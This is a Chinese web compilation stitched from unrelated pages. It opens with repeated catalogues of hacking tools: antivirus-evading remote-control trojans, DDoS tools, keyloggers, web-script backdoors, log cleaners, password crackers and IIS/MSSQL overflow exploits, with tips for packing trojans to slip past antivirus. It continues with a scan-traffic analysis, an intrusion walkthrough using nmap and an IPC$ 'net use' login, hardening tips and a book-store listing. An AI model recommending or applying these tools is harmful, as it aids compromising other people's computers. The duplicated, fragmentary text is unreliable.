网络公牛国产公牛木马,由于上传文件大小限制,包中没有加入易语言运行库文件krnln.fnr! GoToMyPC 4.00 安装简单;能够从任何安装有浏览器的计算机上访问主机;具有新的安全功能! 三、入侵必备 SQL综合利用工具非常好的一个SQL连接器,除了可以输入CMD命令外,还可以直接上传软件! SuperSQLEXEC 用来连接sql server的工具! 3389.exe 开远程机器3389端口的小东东!只要把程序上传到肉鸡运行后,重启既可!
常用入侵检测小工具 svc 远程安装/删除win2k服务 3389.vbs 远程安装win2k终端服务 arpsniffer arp环境sniffer(需要winpcap2.1以上) ascii 查询字符和数字ascii码(常用来对url编码用以躲避ids或脚本过滤) ca 远程克隆账号 cca 检查是否有克隆账号 cgi-backdoor 几个cgi木马(十多种最新的web脚本后门,涵盖 jsp,php,asp,cgi等等) crackvnc 远程/本地破解winvnc密码(本地破用-W参数) pass.dic 密码字典 debploit win2k+sp2配置最佳权限提升工具 fpipe 端口重定向工具 fscan superscan命令行版本(可定义扫描时的源端口并支持udp端口扫描) hgod04 ddos攻击器 idahack ida溢出 idq.dll 利用isapi漏洞提升权限(对sp0+sp1+sp2都非常有效,也是很棒的web后门)
IIS idq溢出 inst.zip 指定程序安装为win2k服务 ip_mail.rar 发送主机动态IP的软件 ipc.vbs 不依赖ipc$给远程主机开telnet ispc.exe idq.dll连接客户端 Keyghost.zip 正版键盘记录器 log.vbs 日志清除器(远程清除不依赖ipc$) md5.pl 论坛md5加密密码破解器 msadc.pl winnt的msadc漏洞溢出器 MsSqlHack mssql溢出程序1 mysql-client mysql客户端 Name.dic 最常用的中国人用户名(看看你常用的用户名在不在里面) PassSniffer 大小仅3kb的非交换机sniffer软件 psexec 通过ipc管道直接登录主机 pskill 杀进程高手:) pslist 列进程高手:) rar 命令行下的winrar reboot.vbs 远程重启主机的脚本 sdemo.zip 巨好的屏幕拍摄的录像软件
黑客常用工具列表大全 分类一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! 下 载 X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! 下载SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! 下载 Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor 下载Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方 式! 下载 SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! 下载 U-Scan.exe 非常好的UNICODE漏洞扫描工具! 下载 RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! 下载 SHED 1.01 一个用来扫描共享漏洞的机器的工具! 下载 DSScan V1.00 ms04-011远程缓冲区溢出漏洞扫描专用! 下载 Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极 快的扫描速度! 下载 WebDAVScan v1.0 针对WEBDAV漏洞的扫描工具! 注意:该软件解压缩时会被查杀! 下载Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! 下载 SQLScan v1.2 猜解开着1433端口的住机密码工具! 下载 RPC漏洞扫描器 v1.03 针对RPC漏洞扫描的工具! 下载 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 下载 自动攻击探测机 Windows NT/2000 自动攻击探测机下载 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 下载 旁注专用检测程序 1.2 旁注入侵专用检测程序,主要功能有查询虚拟主机域名和批量检测 上传漏洞! 下载 二、远程控制 黑洞2004 免杀版藏鲸阁-陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦! 下载 冰河2004 免杀版国内最有名,历史最悠久的木马冰河!本版本是冰河的最新版本,服务器 端只有16KB! 下载 神气儿最新2.0版国产远程控制程序,DLL进程插入,IP反向连接!由第八军团出品! 下载灰鸽子迷你版灰鸽子工作室-葛军同志的作品! 下载 网络神偷 5.7 网络神偷是一个专业级的远程文件访问工具!具有反弹功能! 下载 广外女生 1.53
黑客小工具 时间:2010-03-07 05:57来源:作者:小鱼儿点击:19次 jonelaw 发表于 2006-1-11 11:17:00 一.扫描工具 X-scan 3.1安全焦点出品的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! Domain2.2 集WHOIS查询、上传页面批量检测、木马上传、数据库浏览及加密解密于一体!X-way 2.5 这也上一个非常不错的 jonelaw 发表于 2006-1-11 11:17:00 一.扫描工具 X-scan 3.1 安全焦点出品的扫描器,国内最优秀的安全扫描软件之一!非 常专业的一个扫描器! Domain2.2 集WHOIS查询、上传页面批量检测、木马上传、数据库浏览 及加密解密于一体! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入 侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器! 作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以 及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅 23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDAV漏洞的扫描工具! 注意:该软件会被 查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可 以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编 写! WIN2K自动攻击探测机 Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了r***服务端4899端口的空 口令IP! 注意:会被查杀! 二、远程控制 黑洞2004 免杀版藏鲸阁陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦!
IIS idq 溢出 in st.zip 指定程序安装为win2k服务 ip_mail.rar 发送主机动态IP的软件 ipc.vbs 不依赖ipc$给远程主机开telnet ispc.exe idq.dll 连接客户端 Keyghost.zip 正版键盘记录器 log.vbs 日志清除器(远程清除不依赖ipc$)md5.pl 论坛md5加密密码破解器msadc.pl winnt的msadc漏洞溢出器MsSqlHack mssql溢出程序1
sdemo.zip 巨好的屏幕拍摄的录像软件 shed 远程查找win9x的共享资源 sid 用sid列用户名 SkServerGUI snake多重代理软件 SkSockServer snake 代理程序 SMBCrack 超快的ipc破解软件(适合破一台机) sockchannel反向/重定向端口的后核级后门,在内网某台机安装在外网就可直接登录到内网,与网关无关* SocksCap 把socks5代理转化为万能代理 SPC.zip 可以直接显示出远程win98共享资源密码的东东 sql2.exe mssql溢出程序3 SqlExec mssql客户端 SuperScan GUI界面的优秀扫描器 syn syn攻击第一咼手 upx120 压缩比最大的压缩软件,木马压缩后可以躲避某些杀毒软件, 但不如fsg软件好。 wget 命令行下的http下载软件 Win 2kPass2 win2k的密码大盗 Winn uke 攻击rpc服务的软件(win2ksp0/1/2/3+winnt+winxp 系统不稳定
攻击netbios 的软件(win2ksp0/1/2/3+winnt+winxp 系统死机)smb nuke
利用黑客工具进行渗透 的数据分析 集团文件版本号:(M928-T898-M248-WU2669-I2896-DQ586-M1988)
【经典资料,WORD文档,可编辑修改】 利用黑客工具进行渗透的数据分析 选用工具:X-SCAN 3.3 分析软件:科来网络分析系统2010 beta版 我们知道如果黑客想入侵一个网络,他需要更多的了解一个网络的信息,包括网络拓扑结构,哪些主机在运行,有哪些服务在运行,主机运行的是什么系统,以及该系统主机有没有其他漏洞,和存在一些弱口令等情况等。只有在充分了解了足够多的信息之后,入侵才会变成可能。而黑客入侵之前的扫描是一个比较长时间的工作,同时现象也是比较明显的。我们通过网络分析手段可以很好的把握入侵特征。网络扫描工具很多,比较有名的如国产的冰河和国外的X-scan 等软件。 分析过程 抓包从X-Scan 扫描开始,到扫描结束。抓包后的数据位10M(中间有些数据有其他通信产生)持续时间大概为10分钟。 首先,10分钟产生10M的数据量是不大的,这也就是说单个主机的扫描其实是不占用很多网络带宽的,如图: 上图也反映了一些特征,我们看到,抓包网络内的数据包长只有111.3Byte,这个平均包长是偏小的,而且数据包大小分析发现<=64字节和65-127字节之间的数据占了绝大多少,这就充分说明了网络中有大量的小包存在。 我们接下来看下诊断信息能给我们什么提示, 此外,我们可以从日志选项中查看一些现场,以下是日志的截图: 这种黑客的扫描得出的结果还是很详细和危险的,在不到10分钟之内,就将一个局域网内的各主机的存活,服务,和漏洞情况进行了了解,并且取得了一些效果。例如本次扫描发现一台FTP 服务器的一个账号 test 密码为123456 的情况,这种简单的密码和账号最好不要留下,及时的清理。 总结 扫描行为,主要有三种,ICMP扫描用来发现主机存活和拓扑,TCP 用来判断服务和破解,UDP确定一些特定的UDP服务。扫描是入侵的标志,扫描的发现主要是靠平时
有很多网友都会有个坏习惯,就是不使用电脑的时候也不断开网络连接,这样的话,黑客就可以用更长的时间进行端口以及漏洞的扫描,甚至采用在线暴力破解的方法盗取密码,或者使用嗅探工具守株待兔般等待对方自动把用户名和密码送上门。 要完成一次成功的网络攻击,一般有以下几步。第一步就是要收集目标的各种信息,为了对目标进行彻底分析,必须尽可能收集攻击目标的大量有效信息,以便最后分析得到目标的漏洞列表。分析结果包括:操作系统类型,操作系统的版本,打开的服务,打开服务的版本,网络拓扑结构,网络设备,防火墙等。 一、黑客入侵常用的方法 黑客扫描使用的主要是TCP/IP堆栈指纹的方法。实现的手段主要是四种: 1.TCP ISN采样:寻找初始化序列规定长度与特定的OS是否匹配。 2.FIN探测:发送一个FIN包(或者是任何没有ACK或SYN标记的包)到目标的一个开放的端口,然后等待回应。许多系统会返回一个RESET(复位标记)。 3.利用BOGUS标记:通过发送一个SYN包,它含有没有定义的TCP标记的TCP头,利用系统对标记的不同反应,可以区分一些操作系统。 4.利用TCP的初始化窗口:只是简单地检查返回包里包含的窗口长度,根据大小来唯一确认各个操作系统。 扫描技术虽然很多,原理却很简单。这里简单介绍一下扫描工具Nmap(Network mapper)。这号称是目前最好的扫描工具,功能强大,用途多样,支持多种平台,灵活机动,方便易用,携带性强,留迹极少;不但能扫描出TCP/UDP端口,还能用于扫描/侦测大型网络。 注意这里使用了一些真实的域名,这样可以让扫描行为看起来更具体。你可以用自己网络里的名称代替其中的addresses/names。你最好在取得允许后再进行扫描,否则后果可要你自己承担哦。 nmap -v https://www.doczj.com/doc/b517549311.html, 这个命令对https://www.doczj.com/doc/b517549311.html,上所有的保留TCP端口做了一次扫描,-v表示用详细模式。nmap -sS -O https://www.doczj.com/doc/b517549311.html,/24 这个命令将开始一次SYN的半开扫描,针对的目标是https://www.doczj.com/doc/b517549311.html,所在的C类子网,它还试图确定在目标上运行的是什么操作系统。这个命令需要管理员权限,因为用到了半开扫描以及系统侦测。 发动攻击的第二步就是与对方建立连接,查找登录信息。现在假设通过扫描发现对方的机器建立有IPC$。IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要,在远程管理计算机和查看计算机的共享资源时都会用到。利用IPC$,黑客可以与对方建立一个空连接(无需用户名和密码),而利用这个空连接,就可以获得对方的用户列表。 第三步,使用合适的工具软件登录。打开命令行窗口,键入命令:net use 222.222.222.222ipc$ “administrator” /user:123456 这里我们假设administrator的密码是123456。如果你不知道管理员密码,还需要找其他密码破解工具帮忙。登录进去之后,所有的东西就都在黑客的控制之下了。 二、防止黑客入侵的技巧 因为ADSL用户一般在线时间比较长,所以安全防护意识一定要加强。每天上网十几个小时,甚至通宵开机的人不在少数吧,而且还有人把自己的机器做成Web或者ftp服务器供其他人访问。日常的防范工作一般可分为下面的几个步骤来作。 1)一定要把Guest帐号禁用。有很多入侵都是通过这个帐号进一步获得管理员密码或者权
黑客技术入门---电子书 数量: 或 登录即可开启一键下单。 (什么是“一键下单”?) 分享 黑客攻防入门与进阶(附赠DVD-ROM光盘1张) [平装] ~ 郑斌(作者) 平均 3.3 星浏览全部评论(6 条商品评论) 市场价: ¥33.80 价格: ¥25.00此商品可以享受免费送货详 情
为您节省: ¥8.80 (7.4折) 现在有货。 由卓越亚马逊直接销售和发货。 可配送至北京市朝阳区。查看其它地址的送达时间 如果您希望在明天(7月10日)收到商品,请即刻提交订单,并将送货方式选为快递送货上门-免配送费。 购书满99元,免费得畅销书(促销优惠码:3TQSDHY5) 中国最大的网上书店,天天低价,免费送货:图书满99元就免费得畅销书一本,少儿图书、进口原版图书不参加此活动。查看详情 商品促销和特殊优惠 购买由卓越亚马逊提供的任意一本图书合格购物商品超过1件,同时购买世间所有相遇都是久别重逢+在最深的红尘里重逢套装2册可享受¥ 5.00 元的优惠结账时输入代码 B29QKNV3。如何获得促销优惠 ? 购买由卓越亚马逊提供的任意一本图书合格购物商品超过1件,同时购买《圣经密码》可享受¥6.80 元的优惠结账时输入代码XOMRWDM2。如何获得促销优惠 ? 经常一起购买的商品 顾客购买此书时也通常购买黑客入门与成长秘技108招(实例?上手篇)(附光盘1张)- 黄国耀平装¥22.40 +
价格合计:¥47.40 购买此商品的顾客也同时购买 第1 页, 共8 页前一页 黑客入门与成长秘技108招(实例?上手篇)(附光盘1张)- 黄国耀平均4.0 星(2) ¥22.40 电脑黑客攻防入门(第2版)(配DVD光盘1张) - 九州书源平均2.4 星(7) ¥22.40 外行学电脑系列?外行学黑客攻防从入门到精通(附光盘) - 神龙工作室¥33.80 易语言程序设计基础教程- 苗逢春平均3.3 星(7) ¥22.40 暗战强人:黑客攻防入门全程图解(含DVD光盘1张) - 武新华平均3.0 星(2) ¥37.40